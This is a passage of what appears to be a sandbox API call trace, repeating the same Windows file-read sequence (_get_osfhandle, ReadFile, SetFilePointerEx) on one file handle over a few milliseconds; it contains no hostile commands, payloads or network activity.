hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.339] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.339] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.339] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.344] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.344] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.344] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.344] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.344] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.344] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.344] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.344] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.344] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.344] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.344] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.344] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 